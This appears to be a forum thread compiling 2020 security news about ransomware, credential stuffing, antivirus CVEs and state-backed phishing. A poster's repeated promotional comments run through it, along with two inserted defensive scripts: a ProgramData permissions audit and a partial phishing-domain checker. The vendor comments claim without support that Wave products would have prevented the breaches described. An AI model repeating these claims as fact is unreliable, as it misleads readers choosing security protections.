French IT giant Sopra Steria hit by Ryuk ransomware
https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/
Excerpt:
Sopra Steria is a European information technology company with 46,000 employees in 25 countries worldwide.
==================================================================
Post #246140 could show organizations that they have another way (investing in Wave solutions) to deal with ransomware. This investment could alleviate the possibility that insurance carriers could drop their insurance!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
US Treasury Department ban on ransomware payments puts victims in tough position
https://www.csoonline.com/article/3587108/us-treasury-department-ban-on-ransomware-payments-puts-victims-in-tough-position.html
The Treasury Department's advisory warns companies not to pay ransoms to sanctioned entities. The move complicates ransomware incident response and might encourage insurance carriers to drop ransomware coverage.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Retail, Hospitality and Travel Hit by 64 Billion Credential Stuffing Attacks
https://www.infosecurity-magazine.com/news/retail-hospitality-travel-64-bn/
Over 60% of credential stuffing attacks detected over the past two years have been targeted at retail, travel and hospitality businesses, according to Akamai.
The security vendor’s latest report, Loyalty for Sale, is compiled from internet traffic flowing through its extensive global content delivery network.
It revealed that, during the period July 1 2018 to June 30 2020, it detected over 100 billion credential stuffing attempts. Almost 64 billion of these were aimed at cracking open user accounts in the retail, travel and hospitality sectors.
Further, retail accounted for the vast majority (90%+) of the attacks aimed at these verticals.
Such attacks remain popular given the continuous surge of breached log-ins onto underground sites and the potentially rich pickings to be found inside cracked accounts.
“Criminals are not picky — anything that can be accessed can be used in some way,” said Steve Ragan, Akamai security researcher and report author.
“This is why credential stuffing has become so popular over the past few years. These days, retail and loyalty profiles contain a smorgasbord of personal information, and in some cases financial information too. All of this data can be collected, sold and traded, or even compiled for extensive profiles that can later be used for crimes such as identity theft.”
Akamai also claimed that during the early days of the COVID-19 crisis, as consumers flooded online sites to purchase goods, cyber-criminals began recirculating old credential lists in an attempt to identify new vulnerable accounts.
The report identified not just credential stuffing activity but also attempts to compromise sites directly via SQL Injection (SQLi) and Local File Inclusion (LFI) attacks.
Akamai detected nearly 4.4 billion web attacks against the retail, hospitality and travel sectors, comprising 41% of the total across all verticals. Once again, retail (83%) was the most popular target, while SQLi attacks (79%) were the number one choice of cyber-criminals across the three verticals.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Cybersecurity company finds hacker selling info on 186 million U.S. voters
https://www.nbcnews.com/politics/2020-election/cybersecurity-firm-finds-hacker-selling-info-148-million-u-s-n1244211
The cybersecurity company Trustwave said the hacker was offering 186 million U.S. voter records and 245 million records of other personal data.
WASHINGTON — A cybersecurity company says it has found a hacker selling personally identifying information of more than 200 million Americans, including the voter registration data of 186 million.
The revelation underscored how vulnerable Americans are to email targeting by criminals and foreign adversaries, even as U.S. officials announced that Iran and Russia had obtained voter registration data and email addresses with an eye toward interfering in the 2020 election.
Much of the data identified by Trustwave, a global cybersecurity company, is publicly available, and almost all of it is the kind that is regularly bought and sold by legitimate businesses. But the fact that so many names, email addresses, phone numbers and voter registration records were found for sale in bulk on the so-called dark web underscores how easily criminals and foreign adversaries can deploy it as the FBI said Iran has done recently, by sending emails designed to intimidate voters.
"An enormous amount of data about U.S. citizens is available to cyber criminals" and foreign adversaries, said Ziv Mador, vice president of security research at Trustwave, which found the material.
"In the wrong hands, this voter and consumer data can easily be used for geotargeted disinformation campaigns over social media, email phishing and text and phone scams," he added, "before, during and after the election, especially if results are contested."
The data is a mix of material stolen in various hacks of companies in recent years and publicly available data retrieved from government websites, he said. In most states, voter registration information is publicly available, for example.
Trustwave monitors dark web forums for threat information, and it came across a hacker calling himself Greenmoon2019 who was offering the data for sale. Trustwave used fictitious identities to induce the hacker to provide more information, including a Bitcoin wallet that Greenmoon2019 used to collect payment.
Bitcoin wallets — virtual storage facilities for the most commonly used cryptocurrency — publicly display transactions but not the identities of those making them. Trustwave was able to trace payments to a larger wallet, created in May, that has taken in $100 million in what the company believes is illicit proceeds, Mador said. Not all of that was from data sales, he said.
The wide availability of personal information is not new, but the idea that such a huge cache is for sale as the election approaches underscores how easy it would be for malicious actors to cause trouble. Trustwave said the hacker was offering 186 million voter records and 245 million records of other personal data.
National Intelligence Director John Ratcliffe said Wednesday night that Iran had obtained voter registration information and used it to send threatening emails to Democrats while posing as the Proud Boys, a white supremacist group. Ratcliffe said the Russian government had also obtained voter registration information.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Hardware-based encryption is the key to future proofing data protection concerns
http://digitalmarketingmagazine.co.uk/digital-marketing-data/hardware-based-encryption-is-the-key-to-future-proofing-data-protection-concerns/5077
With recent changes to data protection laws, the data protection landscape is rapidly changing in scope, breadth and depth. Data protection is no longer simply a part of risk management, but also governance and compliance – meaning organizations today must keep up with all that is happening in the world of data protection.
The permanent physical loss of key information such as customer account information could have a severe negative impact on a business and bring about huge penalties and legal costs. The loss of confidentiality of information through a data breach can carry high security threats and put businesses of all sizes at risk. With such high security risks and huge penalties at stake, the protection of electronically stored information – in all its different expressions – should be at the forefront of any business.
As data and business processes evolve with technological advances, enterprises are actively examining how to improve the data protection function from the perspectives of people, processes and technology. In order to select the right data protection technology, the business needs to understand the overall data protection infrastructure portfolio into which individual data protection technologies should fit.
The growing advantages of hardware-based encryption
The disadvantages of software-based encryption have become increasingly apparent in the industry over the years. In software encryption, there are more possible attack vectors that can lead, among others, to the ability for a hacker to crack the password. Software encryption tools also share the processing of your computer, which can cause the whole machine to slow down as data is encrypted/decrypted.
Despite the apparent disadvantages of software-based encryption, some users remain unaware of the potential to solve these problems with hardware-based encryption. Through an industry-wide, open specification for hardware-based Self Encrypting Drives (SEDs), e.g., Opal Family Specifications, developed by Trusted Computing Group (TCG), the issues caused by software-based encryption are being addressed and the reasons for using a SED continue to grow.
Compared to software-based encryption, hardware-based encryption built into a drive offers simplified management, interoperability among drives from different vendors and, most importantly, no performance impact. In fact, using a SED is much more cost-effective than buying higher performance laptop processors to compensate for software Full-Disk Encryption (FDE). SEDs integrate into systems and image the same as non-encrypting drives, with no initial encryption necessary, nor re-encryption when drives are re-imaged.
SEDs and TPMs – the perfect match for future security threats
Strong user authentication is critical for better security. With a SED, access to the platform is based on secure authorization from the SED and not by the software that can be fooled into allowing unauthorized access to data. Mixing hardware-based encryption with Trusted Platform Modules (TPMs) can provide even stronger security benefits. Through combining hardware-based technologies like SEDs with TPMs, enterprises add another layer of security to their systems, ensuring the possibility of any loss of data is drastically reduced.
Hardware-based encryption brings a lot of necessary advantages including compliance, stronger security, integrated authentication and low total cost of ownership with an additional benefit of rapid data destruction or crypto-erase. While these convincing reasons remain valid, additional security scenarios provide even more compelling justification for organizations.
With ever-increasing data demands and the potential for new security threats in the future, corporations are investing in the technology to futureproof their business processes. New approaches such as SEDs, give corporations a way to obtain improved security without the shortcomings of software-based encryption. Once potential users correctly and completely understand the capabilities of SEDs and the misconceptions are corrected as well, the increasing availability of SED options will provide the solution to cope with data security threats both now and long into the future.
Written by TCG Storage Workgroup.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Is Encryption the Answer to Data Security Post Lockdown? #NCSAM
https://www.infosecurity-magazine.com/opinions/encryption-answer-lockdown/
Remote work and working from home has grown exponentially over the past decade. In fact, a 2018 study from Apricorn found that 100 per cent of surveyed IT decision makers noted that they had employees who work remotely at least some of the time.
However, the COVID-19 pandemic and resulting lockdown have forced a large number of employees into unfamiliar territory, not just remote work, but full-time working from home (WFH). While some businesses may have long adopted remote work strategies as part of increased flexibility, others have resisted due to the risks posed to data security and compliance efforts.
Worryingly, a more recent (2020) survey by Apricorn found that more than half (57 percent) of UK IT decision makers still believe that remote workers will expose their organization to the risk of a data breach. Employees unintentionally putting data at risk remains the leading cause of a data breach, with lost or misplaced devices the second biggest cause.
More than a remote risk
Whilst some are already transitioning back into the workplace, many are questioning whether WFH could become the new norm. The issue remains however, that remote working brings a number of challenges to data protection: be it an increased risk of external attacks, or employees’ tendency to relax security practices when working from home. Whatever the case, sensitive information leaving the confines of the office walls will always be more vulnerable than when it is safely secured on the corporate network.
Employees may well be tempted to use personal devices when working from home, or businesses may have introduced the need for video conferencing tools, or document sharing services, but it is critical that businesses take the onus on securing information before employees further put data at risk.
Our survey found that, of those with an information security strategy that covers employees’ use of their own IT equipment for mobile/remote working, forty two per cent said they permitted only corporate IT provisioned/approved devices, and have strict security measures in place to enforce this with endpoint control. Additionally, seven percent tell employees they’re not allowed to use removable media, but don’t have technology in place to prevent this.
Every organization should cover the use of employees’ own IT equipment for mobile and remote working in their information security strategy. If businesses want to secure data on the move, it is essential that encryption and endpoint control is applied to all devices, whether that be laptops, mobile phones, or removable devices such as USBs.
Data must remain on lockdown
Despite COVID restrictions showing some signs of easing, data must always remain on lockdown. Whether working from home or not, the GDPR has clear mandates for data encryption; firstly for compliance (Article 32); secondly to mitigate the impact on any organization who suffers a breach (Article 34) which removes the obligation to individually inform each citizen affected if the data remains unintelligible.
Additionally, article 83 suggests that fines will be moderated where the company has been responsible and mitigated any damage suffered by data subjects. Businesses will find that they are in a stronger position to defend themselves in the event of a breach should they be able to demonstrate the use of encryption practices.
The good news is that we have seen an increase in encryption and endpoint control. Nearly all survey respondents (94%) say their organization has a policy that requires encryption of all data held on removable media. Of those that encrypt all data held on removable media, more than half (57%) hardware encrypt all information as standard.
Businesses are seeing the value of encryption, but this is an ongoing process and it needs to cover all devices. The research highlighted that a number of those surveyed have no further plans to expand encryption on USB sticks (38%), laptops (32%), desktops (37%), mobiles (31%) and portable hard drives (40%). With so much data now moving beyond the corporate perimeter, it’s imperative to address the importance of encryption in protecting sensitive information, whilst giving staff the flexibility required to work remotely.
The value of encryption
Hardware encryption offers much greater security than software encryption and PIN pad authenticated, hardware encrypted USB storage devices offer additional, significant benefits. Being software-free eliminates the risk of keylogging and doesn’t restrict usage to specific Operating Systems; all authentication and encryption processes take place within the device itself, so passwords and key data are never shared with a host computer. This makes it particularly suited for use in highly regulated sectors such as defense, finance, government and healthcare.
By deploying removable storage devices with built-in hardware encryption, a business can roll this approach out across the workforce, ensuring all data can be stored or moved around safely offline. Even if the device is lost or stolen, the information will be unintelligible to anyone not authorized to access it.
The pandemic has thrown up many challenges this year, but data protection should not have been one of them. It should not be an afterthought, something incorporated into the business strategy as a result of an incident, but one that’s core to business operations and security best practice.
Organizations should analyze their data, identify everything that should be protected, understand where it exists and how it is transported, and ensure that it is encrypted at all stages of its lifecycle. Encryption and endpoint control can ensure that data remains secure and businesses can be prepared for the risks that come with an enduring remote workforce.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
What is a TPM?
https://securityboulevard.com/2020/10/what-is-a-tpm/
A TPM, also known as a Trusted Platform Module, is an international standard for a secure cryptoprocessor and is a chip found on the computer’s motherboard. The function of a TPM is to generate encryption keys and keep a part of the key inside the TPM rather than all on the disk. This is helpful for when an attacker steals the disk and tries to access the contents elsewhere. The TPM provides hardware-based authentication so if the would-be attacker were to try and remove the chip and place it onto another motherboard, or try to tamper with the motherboard to bypass the encryption, it would deny access.
What is the Difference Between HSM and TPM?
For the most part hardware security modules (HSM) and TPMs are similar in function and are used for encryption, but there are two notable differences that can be made between the two. A hardware security module is typically an external device while TPMs are chips that are embedded into the motherboard. The other difference is that you can easily add an HSM to a computer or network, while a TPM is usually not considered feasible to add after the computer is in use.
Does My Computer Have a TPM?
Off-the-shelf computers have a TPM soldered onto the motherboard, however, if you are building your own computer then you can easily buy one as an add-on module for a relatively cheap price. Installing a TPM in your computer is very simple, just find the port on your motherboard (if it supports a TPM module) and plug it in.
Can You Remove a TPM chip?
This depends on the type of computer you own. As previously stated, if you purchased your computer off-the-shelf then the TPM is typically soldered onto the motherboard, meaning that removal of the TPM would damage both the TPM and the motherboard, rendering both useless for the attacker. However, if you had the TPM as an add-on and installed it yourself, it can easily be removed, but the encrypted contents would still be safe as the TPM uses hardware-based authentication, meaning that it can’t be used when affixed onto another motherboard.
Can You Clear a TPM?
Yes, all you need to do is go into your security center app. However, it is not recommended as it can lead to data loss and you would lose all created keys associated with the TPM. If you must clear your TPM, then it is strongly recommended to have a backup and recovery for any data that is stored in your TPM.
Can a TPM be Hacked?
For the most part, TPMs are secure; however, Christopher Tarnovsky found a way to break chips that carry a TPM by essentially spying on them like a phone conversation. This attack was used on Infineon Technologies AG's flagship model; Infineon is regarded as one of the top makers of TPM chips.
So does that make TPMs a liability? Well, not exactly. This attack was so resource heavy that Tarnovsky stated that unless you are a multi-million dollar corporation, this attack just isn’t worth it and is incredibly difficult to pull off in a real-world environment.
Key Attestation
A key attestation with a TPM is like a signature where it proves the origin of the certificate to the certificate authority to acknowledge that the TPM that is making the request is the same TPM that the certificate authority trusts. Key attestation is important because it allows the private key to not only be stored on the disk, but another key to be isolated and stored inside the TPM on that device so that you can benefit from a higher level of security due to the non-exportability of the TPM key.
Trusted Platform Module with Certificates
Using a TPM as your only protection against attackers is not recommended, as although a TPM protects your files from a physical attack, the ever-present threat of the infamous MITM attack can still grant access to your files. SecureW2 uses certificates to prevent over-the-air attacks and our management portal also supports security key attestation, as our software client can attest to the location a private key has been generated on a security key, or any other device with a TPM. Our industry-leading PKI makes it easy to configure BYOD and managed devices for 802.1x authentication and self-enrollment for certificates in just a few clicks.
We have affordable options for organizations of every size. Check out our pricing here.
The post What is a TPM? appeared first on SecureW2.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Morgan Stanley Fined $60m Over Data Disposal
https://www.infosecurity-magazine.com/news/morgan-stanley-fined-60m-over-data/
American multinational investment bank and financial services company Morgan Stanley has been fined $60m for improperly disposing of personal data.
The substantial fine was imposed on Morgan Stanley Bank, N.A., and Morgan Stanley Private Bank, N.A. by the US Office of the Comptroller of Currency (OCC), which discovered deficiencies in the banks' data decommissioning practices.
The federal banking agency found that in 2016, the banks "failed to exercise proper oversight of the decommissioning of two Wealth Management business data centers located in the United States."
Among the issues flagged by the OCC were inadequate risk assessment and monitoring of third-party vendors and a failure to keep track of customer information.
A consent order for the assessment of a civil money penalty states that the banks "failed to effectively assess or address the risks associated with the decommissioning of its hardware; failed to adequately assess the risk of using third party vendors, including subcontractors; and failed to maintain an appropriate inventory of customer data stored on the devices."
Morgan Stanley, which is headquartered in New York City, was also found to have failed to exercise adequate due diligence in selecting the third-party vendor engaged by Morgan Stanley and failed to adequately monitor the vendor’s performance.
Three years on from the decommissioning of the two data centers, the OCC found data disposal at the banks was still not as it should be.
"In 2019, the banks experienced similar vendor management control deficiencies in connection with decommissioning other network devices that also stored customer data," stated the comptroller.
Morgan Stanley, at the OCC’s direction, notified potentially impacted customers of the 2016 incident, and voluntarily notified potentially impacted customers of the 2019 incident. The bank has undertaken initial corrective actions, and the OCC states that it "is committed to taking all necessary and appropriate steps to remedy the deficiencies."
The OCC found the noted deficiencies constitute "unsafe or unsound practices" and resulted in noncompliance with 12 CFR Part 30, Appendix B, "Interagency Guidelines Establishing Information Security Standards."
The $60m civil money penalty will be paid to the United States Treasury.
=================================================================
What about ABC Investment Bank that retires computers that show up on EBAY. It seems that investing in Wave SED management would be a lot better than a massive fine. Disposing of computers' hard drives is so much easier using the crypto erase feature with Wave SED management than the other methods!!! It's these difficult methods that could be the reason that the data remains on these hard drives and could lead to noncompliance and drives getting into the wrong hands, and fines!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Trump ‘Nobody Gets Hacked’ Video Goes Viral
https://www.forbes.com/sites/kateoflahertyuk/2020/10/20/trump-nobody-gets-hacked-video-goes-viral/
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Cybersecurity And Your Passwords
https://www.forbes.com/sites/forbestechcouncil/2020/10/19/cybersecurity-and-your-passwords/#e62b50137320
==================================================================
Wow, those are the recommendations. No wonder every user on the internet is fed up. Try Wave VSC 2.0 (2FA)!!! It's more secure and simpler to use (for enterprise). Wave Knowd (no passwords and unfortunately in retirement - but shouldn't be) could make the experience on the internet like no other! These two Wave solutions could make users much happier and more secure!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
CyberArk Discover Numerous Vulnerabilities In Popular Antivirus Solutions
https://latesthackingnews.com/2020/10/09/cyberark-discover-numerous-vulnerabilities-in-popular-antivirus-solutions/
Researchers from CyberArk Labs have found serious vulnerabilities in multiple antivirus solutions. Briefly, they found privilege escalation bugs in these programs that exposed the devices to cyber threats. Vulnerabilities in antimalware products are significantly threatening since these programs usually run with high privileges, often at the admin level. Hence, any bugs here, especially the privilege escalation found by CyberArk, could give elevated access to an adversary.
Briefly, the researchers observed that in most cases, the issues existed because of the default DACLs of the C:\ProgramData directory. This directory, on Windows, is accessible by all users, unlike %LocalAppData%, which is specific to the logged-in user only. It means any user can read/write files in ProgramData and will have full control of the data present here. Thus, any process created by a non-privileged user that a privileged user executes later will give rise to security issues. Such exploitation could allow for symlink attacks, whilst deleting arbitrary files and pointing to malicious files. Also, they found a DLL hijacking flaw affecting some antivirus programs. Technical details about these vulnerabilities are available in the researchers’ post. The following is the list of all programs that had the vulnerabilities, with the respective CVEs:
Kaspersky: CVE-2020-25045, CVE-2020-25044, CVE-2020-25043
Trend Micro: CVE-2019-19688, CVE-2019-19689 +3
Symantec: CVE-2019-19548
McAfee: CVE-2020-7250, CVE-2020-7310
Checkpoint: CVE-2019-8452
Fortinet: CVE-2020-9290
Avira: CVE-2020-13903
Microsoft: CVE-2019-1161
Avast + F-Secure: Waiting for Mitre
Please see the link for the rest of the article.
=================================================================
Wave Endpoint Monitor sounds better and better!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
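The article above describes the root cause as the permissive default DACL on C:\ProgramData: a low-privilege user can write there, and a privileged security product later trusts what it finds. The script below is an added example (not from the article, CyberArk's research, or Wave) that a defender can run to audit which product subdirectories under ProgramData grant write, modify or delete rights to broad local principals; the root path, depth and principal list are assumptions and can be adjusted.

```powershell
# Added example: audit directory DACLs under C:\ProgramData for entries that let any
# local user create, replace or delete files. Assumptions: run from a PowerShell 5+
# session by a user allowed to read the ACLs; $Root, $Depth and $BroadPrincipals are
# constructed defaults, not values from the article.
param(
    [string]$Root  = 'C:\ProgramData',
    [int]   $Depth = 1
)

# Principals that effectively mean "every non-privileged local user".
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow planting or swapping content (a symlink, a DLL, a replaced file)
# that a higher-privileged process may later open, load or delete.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::Delete

function Test-BroadWriteAccess {
    # Emits one record per Allow ACE that grants a broad principal write-class rights.
    param([Parameter(Mandatory)][string]$Path)

    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # $true = inherited from ProgramData's default DACL
            }
        }
    }
}

# Walk the product subdirectories and report the findings, most permissive paths first.
Get-ChildItem -LiteralPath $Root -Directory -Depth $Depth -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Test-BroadWriteAccess -Path $_.FullName } |
    Sort-Object Path, Principal |
    Format-Table -AutoSize
```

Entries marked Inherited are the ProgramData default the article describes; the rows worth a vendor ticket are product directories whose files a privileged service later loads or deletes, since the fix belongs in that product's installer (a tighter DACL on its own subdirectory) rather than in ProgramData itself.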
Google Says Chinese Hackers Are Impersonating McAfee to Trick Victims Into Installing Malware
https://gizmodo.com/google-says-chinese-hackers-are-impersonating-mcafee-to-1845399061
=================================================================
The same Chinese government-linked hackers who targeted the campaigns of both 2020 presidential candidates earlier this year have been trying to trick users into installing malware by posing as the antivirus provider McAfee and using otherwise legitimate online services like GitHub and Dropbox.
Shane Huntley, the head of Google’s Threat Analysis Group, offered new details about the suspected state-sponsored cyberattackers, known as APT 31, and their latest tactics in a company blog post on Friday. In June, Google’s security team uncovered high-profile phishing scams by APT 31 and Iranian state-sponsored hackers intended to hijack the email accounts of campaign staffers with President Donald Trump and Democratic nominee Joe Biden. (All of these phishing attempts appeared to have failed, Google said at the time).
On Friday, Huntley said that one of APT 31's latest hacking techniques involved emailing links that would download malicious code hosted on the open-source platform GitHub. The malware was built using the Python computing language and “would allow the attacker to upload and download files as well as execute arbitrary commands” through Dropbox’s cloud storage services, he wrote.
“Every malicious piece of this attack was hosted on legitimate services, making it harder for defenders to rely on network signals for detection,” Huntley said.
Another phishing scam saw the group impersonating McAfee, a legitimate and popular antivirus software provider, as a facade to quietly slip malicious code onto the target’s machine.
“The targets would be prompted to install a legitimate version of McAfee anti-virus software from GitHub, while malware was simultaneously silently installed to the system.”
Google did not specify which organizations or individuals were targeted in these latest APT 31-sponsored attacks or whether they affected either candidate’s political campaign. The tech giant only said that it had seen “increased attention on the threats posed by APTs in the context of the U.S. election” and shared these latest findings with the Federal Bureau of Investigation.
“U.S government agencies have warned about different threat actors, and we’ve worked closely with those agencies and others in the tech industry to share leads and intelligence about what we’re seeing across the ecosystem,” Huntley said.
He added that in the event that Google’s anti-phishing safeguards detect a government-backed attack, the company sends the intended victim a warning explaining that a foreign government may be targeting them.
Google isn’t the only tech giant seeing an increase in cyberattacks ahead of the election. In September, Microsoft reported that Chinese, Russian, and Iranian government-backed hackers had launched similarly unsuccessful attacks on high-profile individuals associated with both the Trump and Biden campaigns. Last week, the FBI and U.S. Cybersecurity and Infrastructure Security Agency also released details about campaigns by foreign government-linked hackers to exploit federal, state, and local government networks.
=================================================================
Wave Endpoint Monitor keeps sounding better and better!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Twitter hack probe leads to call for cybersecurity rules for social media giants
https://techcrunch.com/2020/10/14/twitter-hack-probe-leads-to-call-for-cybersecurity-rules-for-social-media-giants/?renderMode=ie11
=================================================================
Wave Knowd, tested under the NSTIC, and Wave Scrambls could be two solutions with which both Twitter and Facebook could have better security for themselves and their users, from the brilliant minds of Michael and Steven Sprague and others!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Robinhood Internal Probe Finds Hackers Hit Almost 2,000 Accounts
https://www.bloomberg.com/news/articles/2020-10-15/robinhood-estimates-hackers-infiltrated-almost-2-000-accounts
=================================================================
Users of 2FA in this article did not stop the hackers!!
=================================================================
If Robinhood users had been given the choice of 2FA or no passwords, Wave VSC 2.0 and Wave Knowd could have saved them a lot of money and the stress that goes with having money stolen. These two Wave solutions could have protected their other online accounts as well. Because these two solutions were created by The Trusted Computing Company, Wave, security is second to none.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Cybercrime Losses Up 50%, Exceeding $1.8B
https://www.darkreading.com/vulnerabilities---threats/cybercrime-losses-up-50--exceeding-$18b/a/d-id/1339041
Fewer companies are being hit by cyber incidents, but those that do get hit are hit harder and more often.
The world is rightly obsessed with the COVID-19 pandemic right now, but there's also a growing cybercrime pandemic. The good news is that fewer firms are reporting breaches. The bad news is that for those who are victimized, the attacks are more severe — and more expensive.
According to Hiscox, a Bermuda-based insurance provider, cyber losses rose nearly sixfold worldwide over the past 12 months. Its recently released "Cyber Readiness Report 2020" pins the total cyber losses among affected firms at $1.8 billion — up a sobering 50% from the previous year's total of $1.2 billion. Overall, more than 6% of the respondents in the report paid a ransom, and their collective losses totaled $381 million.
Interestingly enough, Hiscox says that companies are 15 times more likely to experience a cyberattack (30% in UK) than a fire or theft (2% in UK).
Who Was Most at Risk?
Not surprisingly, larger organizations were the most common targets — and shelled out the most money — for cybercriminals. The financial impact differed widely across countries, verticals, and firm sizes. According to Hiscox, the energy, manufacturing, and financial services sectors are especially at risk. This is the result of low maturity in cyber resilience and low tolerance to what is often a high-impact outage.
Irish and German companies reported the biggest median losses, but the pain was widely shared. Among the attacked organizations, the median losses for energy firms increased over 30-fold, while a number of other sectors faced losses many times greater than the previous year. The biggest recorded loss for a single organization was $87.9 million (for a UK financial services firm), and the greatest loss stemming from a single attack was $15.8 million (for a UK professional services firm).
Cybercriminals demanded ransoms from roughly 17% of the companies they attacked, and caused dire financial consequences for the targets. The highest loss from ransom was more than $50 million for one unfortunate organization.
According to the Hiscox report, malware, ransomware, business email compromise, and distributed denial-of-service (DDoS) are still the most commonly used attack vectors. Besides malicious encryption imposed through ransomware, other extortion campaigns include DDoS attacks that cause the victim's IT infrastructure to crash over and over due to a constant flood of bogus IP traffic. Recently, the stock exchange in New Zealand weathered a barrage of DDoS attacks that disrupted business operations and trading for four consecutive days. CNBC reported that the exchange's websites and markets announcement platform were also affected.
Large Number of "Don't Knows"
According to Hiscox, this year the share of firms that revealed they'd suffered a cybersecurity incident in the last year shrank from 61% to 39%. At least that's positive. The flip side is that the financial blowback has been far greater than before. Larger companies were more likely to be targeted than smaller ones. Just over half (51%) of all enterprise-level firms — those with 1,000-plus employees — reported at least one cyber incident, and the most cyber incidents by far (median: 100) and breaches (80). The most heavily targeted sectors were financial services; manufacturing; and technology, media, and telecoms (TMT) — with 44% of firms in each sector reporting at least one incident or breach.
Of particular concern is that 11% of the respondents said they weren't sure how many times they were targeted. (That's 4% more than the previous year.) Even more worrisome is that the greatest share of "I don't knows" (15%) came from enterprise firms.
Surge in Spending
The report revealed that a large and broad increase in cybersecurity spending has occurred over the past year. The average spending among the respondents was $2.1 million, up from $1.5 million the previous year. (Roughly 75% of the respondents provided figures for their cybersecurity spending.) Assuming the numbers are an accurate reflection of what's going on more broadly, the total cybersecurity spending in the past year was a staggering $11.4 billion. That compares with $7.9 billion a year ago for a sample of companies that was 3% smaller. Nearly three-quarters of firms (72%) intend to boost cybersecurity spending by 5% or more in the next year — that's up from two-thirds (67%) from the 2019 number.
As one might expect, the companies that dedicated double-digit percentages of their IT budget were less likely to have suffered a breach than those that spent less than 5%. But those big spenders, typically larger firms, had higher average costs stemming from breaches. Greater size means more customers, higher notification expenses, and bigger ransoms.
Preparation Pays Off
A notably higher percentage of this year's respondents reported that they had a harder time attracting new customers (15% of firms were targeted, up from 5% last year) after a cyber incident. They also lost more customers (11%, compared with 5% in 2019) and/or business partners (12% compared with 4%).
When asked about the adverse effects of a breach, 14% of the respondents mentioned bad publicity that tarnishes the brand or the company's reputation. Only 5% said the same thing in 2019. Thirteen percent said business performance indicators — such as their share price — were affected, up from 5% last year.
In terms of cyber readiness, size matters. Hiscox reports that large companies have more resources and can spend an order of magnitude more on warding off online evildoers than their smaller counterparts. No surprise there. Among the smaller firms that were ready to face off with the cybercriminals, 16% were digitally savvy TMT companies. Retail and wholesale and construction were also well prepared (11% and 10%, respectively). The Hiscox report concludes that most of the best-protected organizations achieved their preparedness by "taking cyber security seriously."
=================================================================
An increase of $3.5 billion was spent on cybersecurity, and there was an increase of $600 million in loss due to cybercrime. The cybersecurity dollars could be spent in a more efficient and effective place: Wave solutions!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Iranian state hacker group linked to ransomware deployments
https://www.zdnet.com/article/iranian-state-hacker-group-linked-to-ransomware-deployments/
Amidst rising tensions between Israel and Iran, security researchers fear new escalation.
=================================================================
Iranian APT Group Targets Global Universities Again
https://www.infosecurity-magazine.com/news/iranian-apt-group-targets-global/
An Iranian state-backed APT group known for targeting universities for research materials has been detected in a new campaign coinciding with the start of the new academic year.
Silent Librarian (aka TA407, Cobalt Dickens) is once again casting the net wide geographically. It has registered phishing sites for universities in: Australia (Victoria, Adelaide and Melbourne Victoria), the UK (Glasgow Caledonian, King’s College London, Bristol, Cambridge and others), the US (North Texas, McGill, Stony Brook), Singapore (Nanyang Technological), Canada (Western, Toronto) and in Sweden, Germany and the Netherlands.
Using a similar pattern to that spotted in previous campaigns, the group keeps most of the domain intact but simply swaps the TLD, which can happen if organizations don’t defensively register enough variants.
Although Silent Librarian is using Cloudflare to hide the true location of its servers, Malwarebytes said it was able to identify several based in Iran.
“It may seem odd for an attacker to use infrastructure in their own country, possibly pointing a finger at them,” the firm’s Threat Intelligence Team wrote in a blog post. “However, here it simply becomes another bulletproof hosting option based on the lack of cooperation between US or European law enforcement and local police in Iran.”
It warned that although sites are being taken down as quickly as possible, the group has amassed a sizeable number in order to continue its phishing campaign unabated.
“IT administrators working at universities have a particularly tough job considering that their customers, namely students and teachers, are among the most difficult to protect due to their behaviors. Despite that, they also contribute to and access research that could be worth millions or billions of dollars,” said Malwarebytes.
“Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded.”
Silent Librarian was spotted in 2018 and 2019 performing similar attacks.
=================================================================
Given these cyber incidents, Wave and its partners could be doing a superior job helping prevent these problems from occurring in the first place. Better security in Wave solutions could alleviate a lot of stress and save a lot of money in these instances. A good offense needs a great defense!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
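The Silent Librarian write-up above says the group keeps a university's domain label and only swaps the TLD, which works when the organisation has not registered (or is not watching) enough variants. The following is an added example, not code from the article or from Malwarebytes: it strips a hostname down to its registrable label, flags entries in a newly-observed-domains feed that reuse a protected label under a suffix the organisation does not own, and lists the variants worth registering. The two-label public-suffix table, the protected domains and the observed feed are constructed for illustration; a real deployment would load the full Public Suffix List.

```python
"""Flag newly observed domains that keep a protected domain's label and swap
the TLD (the Silent Librarian pattern). Added example; not code from the
article or Malwarebytes. Suffix table and sample data are constructed."""
from __future__ import annotations

# Two-label public suffixes this check understands. Constructed subset; a real
# deployment would load the full Public Suffix List instead.
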